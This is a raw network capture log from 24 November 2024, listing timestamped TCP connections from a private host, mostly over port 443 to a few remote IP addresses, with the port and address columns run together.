                                                                                                                                                                        Nov 24, 2024 05:11:56.098226070 CET49802443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.098390102 CET49802443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.098412991 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.103379011 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.103437901 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.103486061 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.103641987 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.103652954 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.103661060 CET49794443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.103666067 CET4434979413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.107146025 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.107208014 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.107310057 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.107543945 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.107562065 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.146576881 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.146637917 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.146689892 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.146905899 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.146914005 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.146939039 CET49795443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.146943092 CET4434979513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.148885012 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.148942947 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.149004936 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.149184942 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.149184942 CET49797443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.149216890 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.149229050 CET4434979713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.150132895 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.150166035 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.150233984 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.150388956 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.150399923 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.151336908 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.151395082 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.151487112 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.151623011 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:56.151643038 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.983656883 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.983860970 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.983978987 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.984807014 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.987432957 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.987447023 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.988085032 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.988089085 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.988459110 CET49801443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.988487005 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.988923073 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.989037037 CET49801443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.989042044 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.989280939 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.989293098 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.989618063 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.989620924 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.990484953 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.990499973 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.990884066 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.990890980 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.991087914 CET49802443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.991122007 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.991461992 CET49802443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:57.991470098 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.047344923 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:11:58.047396898 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.047615051 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:11:58.047900915 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:11:58.047916889 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.418044090 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.418126106 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.418179989 CET49802443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.419344902 CET49802443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.419374943 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.419390917 CET49802443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.419399023 CET4434980213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.423479080 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.423512936 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.423577070 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.423594952 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.423652887 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.427056074 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.427114964 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.427164078 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.427882910 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.427961111 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.428006887 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.431901932 CET49811443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.431947947 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.432010889 CET49811443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.432532072 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.432549953 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.432559967 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.432565928 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.433113098 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.433131933 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.433142900 CET49803443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.433150053 CET4434980313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.434998989 CET49811443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.434997082 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435018063 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435053110 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435115099 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.435127974 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435394049 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.435405016 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435412884 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.435722113 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435831070 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435859919 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.435883999 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.435887098 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.435941935 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.436424971 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.436436892 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.438015938 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.438035965 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.438122034 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.438235998 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.438245058 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.438895941 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.438905954 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.438976049 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.439174891 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.439187050 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.441131115 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.441185951 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.441237926 CET49801443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.441248894 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.441313028 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.441344976 CET49801443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.441358089 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.441368103 CET49801443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.441371918 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.441379070 CET49801443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.441384077 CET4434980113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.444333076 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.444340944 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.444406033 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.444524050 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:11:58.444533110 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.910037994 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:11:58.910068989 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.910151005 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:11:58.911716938 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:11:58.911726952 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:59.189146996 CET4976180192.168.2.7185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:59.795876980 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:59.806238890 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:11:59.806272030 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:59.807149887 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:59.807303905 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:11:59.808357954 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:11:59.808419943 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:59.929116011 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:11:59.929131985 CET44349810142.250.181.100192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.116275072 CET49810443192.168.2.7142.250.181.100
                                                                                                                                                                        Nov 24, 2024 05:12:00.158195019 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.158642054 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.158699989 CET49811443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.158763885 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.159512997 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.159516096 CET49811443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.159523964 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.159534931 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.159950018 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.159956932 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.219748974 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.221995115 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.222009897 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.222563982 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.222573042 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.223016024 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.226052999 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.226087093 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.228656054 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.228708982 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.228718042 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.229332924 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.229345083 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.230199099 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.230202913 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.383709908 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.383810043 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.391951084 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.391999960 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.392077923 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.392287970 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.392299891 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.400063992 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.400075912 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.400309086 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.493846893 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.539344072 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.600095034 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.600272894 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.600327969 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.601854086 CET49812443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.601881981 CET4434981213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.604063034 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.604083061 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.604124069 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.604172945 CET49811443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.605411053 CET49811443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.605432987 CET4434981113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.608689070 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.608705044 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.608827114 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.610694885 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.610733986 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.610904932 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.611083031 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.611093044 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.611779928 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.611799955 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.662878036 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.667066097 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.667213917 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.667299986 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.669783115 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.670624018 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.670702934 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.673954010 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.677254915 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.735374928 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.735397100 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.736517906 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.736557007 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.737623930 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.737628937 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.915632963 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.915685892 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.915834904 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.942523003 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.942539930 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.942653894 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.943367958 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.943381071 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.943720102 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.943726063 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.943747997 CET49816443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.943752050 CET44349816184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.948816061 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.948865891 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.948926926 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.956017971 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.956078053 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.956214905 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.956228971 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.956238985 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.957170010 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.957185030 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.958038092 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.958045959 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.958112955 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.958230019 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:00.958235979 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.977768898 CET49827443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.977816105 CET44349827184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.977905989 CET49827443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.978205919 CET49827443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:00.978224993 CET44349827184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.178209066 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.198363066 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.198383093 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.199985027 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.200054884 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.206038952 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.206222057 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.206298113 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.206310034 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.249150038 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.397027016 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.397677898 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.397701025 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.398240089 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.398247957 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.448117018 CET44349827184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.448205948 CET49827443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:02.449640989 CET49827443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:02.449654102 CET44349827184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.449877024 CET44349827184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.451004028 CET49827443192.168.2.7184.30.17.174
                                                                                                                                                                        Nov 24, 2024 05:12:02.457319021 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.457746029 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.457777023 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.458621979 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.458627939 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.495332956 CET44349827184.30.17.174192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.662090063 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.662126064 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.662137032 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.662164927 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.662178040 CET4434982013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:02.662192106 CET49820443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:02.662200928 CET4434982013.107.246.63192.168.2.7
